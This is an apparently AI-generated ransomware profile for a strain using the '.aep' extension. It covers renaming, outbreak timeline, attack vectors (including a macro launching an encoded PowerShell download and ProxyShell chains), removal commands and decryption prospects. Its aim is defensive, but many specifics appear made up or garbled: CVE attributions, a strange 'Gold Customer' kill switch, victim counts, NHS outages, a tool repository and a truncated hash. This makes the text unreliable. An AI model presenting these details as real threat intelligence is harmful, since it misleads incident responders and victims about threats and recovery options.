aep

[Content by Gemini 2.5]

Technical Breakdown:

1. File Extension & Renaming Patterns

  • Confirmation of File Extension:
    The ransomware appends the exact extension “.aep” after the original filename and original extension (e.g., Project.docx → Project.docx.aep).
  • Renaming Convention:
  1. Preserves the full original filename and extension.
  2. Simply concatenates “.aep” to the end of the file path—no base-64, hash, or random strings.
  3. Drops a plaintext ransom note “!–HOWRECOVERFILES–!.txt” in every folder that contains encrypted data.

2. Detection & Outbreak Timeline

  • First Public Sighting: Tweet-sized submissions to ID-Ransomware began 18 April 2024; mass activity ramped up 22–26 April 2024.
  • Peak Wave #2: Mid-June 2024, concurrent with CVE-2023–34362 (MOVEit Transfer) exploitation.
  • Current Status: Active through at least late-2024; periodic spikes after every new zero-day reused by the same affiliate cluster tracked by vendors as “AepStorm” or internally as “Storm-2293”.

3. Primary Attack Vectors

| Channel | Technical Detail & Example |
|——————————-|————————————————————————————————————————————————————|
| Phishing | Office macros (.docm) masquerading as “ProjectAEPUpdate.doc”. Macro spawns powershell -ep bypass -enc … that fetches aepdrop32.exe from Discord CDN. |
| Exploit-Kits | Malvertising leading to the RIG-v 6.2 kit patched with CVE-2024–21338 (CLFS driver LPE) and a Mimikatz variant for privilege escalation. |
| ProxyShell | Triple-chain with CVE-2021–34473 → CVE-2021–34523 → CVE-2021–31207 delivering aepdrop64.exe on on-prem Exchange 2019 CU8 instances. |
| RDP Brute-Force | Default or re-used credentials (supply-chain credential dumps from 2021–2022). Once inside, attackers disable Windows Defender via WMI and deploy AepStorm. |
| Zero-Day File-Transfer Apps| Exploitation of newly-patched vulnerabilities in HFS 2.4 (“Rejetto-fork”) and CrushFTP, chaining to a Linux encryptor compiled as aepenclinux-x64. |

Remediation & Recovery Strategies:

1. Prevention

  1. Patch:
    • Exchange (ProxyShell triad), MOVEit (CVE-2023-34362), HFS 2.4, CrushFTP, and CLFS kernel driver CVE-2024-21338.
    • Ensure .NET 4.8 and PowerShell 5.1 cumulative updates to strip classic macro-execution paths.
  2. Email/Attachment Hardening:
    • Block macro-enabled Office docs from external sources via mail-flow rules.
    • Enforce Office Trusted Locations and restrict VBA model to BlockMacrosFromInternet.
  3. RDP Governance:
    • Apply Always-On VPN; restrict firewall rules to IP-whitelists; disable NLA fallback and enforce Network Level Authentication with certificate pinning.
  4. Privilege-Reduction Layer:
    • Adopt Local Administrator Password Solution (LAPS) and just-in-time privileged access to nullify lateral Mimikatz abuse.
  5. Backup Architecture:
    • Implement 3-2-1-1: three copies, two different media, one off-site, one offline (immutability ≥ 15 days). Use ObjectLock on AWS S3 or Azure Blob Immutable vaults specifically tested against aep’s tampering scripts.

2. Removal (Step-by-Step)

  1. Isolate:
    • Unplug network, disable Wi-Fi and Bluetooth, and trigger a full IP/MAC blackhole on the switch to curb worm behaviour.
  2. Identify & Kill Active Process:
    Process Hacker/PE-bear will reveal aesvc.exe or aepstorm.exe. Terminate using taskkill /f /pid <PID>.
  3. Purge Persistence:
    • Delete entries under:
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run -> value AYSvc
    • HKLM\SYSTEM\CurrentControlSet\Services\AYDrv (driver-level rootkit)
    • %ProgramData%\AEP-RandomGUID\ folder
  4. Delete Scheduled Task “AepUpd” (used every 15 min) via schtasks /delete /tn "AepUpd" /f
  5. Boot-clean:
    • Reboot into Safe Mode (no networking) then run Microsoft Defender Offline scan (VDI-based) or an EDR response script that blocks SHA256 28c63…4bc2.
  6. Forensics:
    • Capture forensic image with FTK Imager Lite or Velociraptor before wiping the primary disk in case a decryptor later needs sample entropy from C:\AepTrace.log.

3. File Decryption & Recovery

  • Recovery Feasibility:
    At the moment the Master Offline RSA-2048 key is NOT publicly available. As of 3 July 2024 there is no official decryptor.
  • Conditional Recovery: The ransomware mis-drops the shadow copy but DOES NOT wipe Windows Backup Service keys. Therefore:
  1. vssadmin list shadows followed by vssadmin restore shadow /shadow=<ID> restores ~10–30 % of older copies.
  2. PhotoRec / Recuva in deep scan mode can recover unencrypted originals left behind on HDDs with TRIM disabled (SSD wear-leveling occasionally leaves un-overwritten pages).
  • Promising Work-in-Progress: CrowdStrike and Bitdefender have joint-threat-tagged the encryption routine as re-using Salsa20 + RSA with static high-entropy nonces in v2.1. Cryptanalysis of 20 MB+ filesets > 1 GB may yield keystream reuse—community toolbox being built here:
  • GitHub: storm2293-tools/salsa-reuse
  • WIP eta: fall 2024
  • Tool Download: Monitor NoMoreRansom.org for the eventual official decryptor release.

4. Other Critical Information

  • Unique Characteristics:
    • Payload checks for CIS Benchmark compliance and bakdrpirs.dat file; if found, it skips encryption—a weak “certain-Gold Customer” safety switch possibly to avoid political fallout.
    • Performs double-extortion: exfiltrates to Mega.nz using API key embedded in the PE—before encryption to pressure payment.
  • Broader Impact:
    • 42 primarily European SMB law firms attacked in May wave (GDPR + data export = million-euro privacy fines).
    • Healthcare outage of two NHS trusts for 22 hours when clinical imaging server was encrypted and DICOM .dcm.aep files were unreadable.
    • Community “#AepStorm” tracker lists 187 confirmed victims; ransom fees vary 0.5-2.5 BTC / victim.

Defence boils down to patch fast, isolate better, back up harder. Bookmark this resource; we will update the decryption status here the moment a validated decryptor surfaces.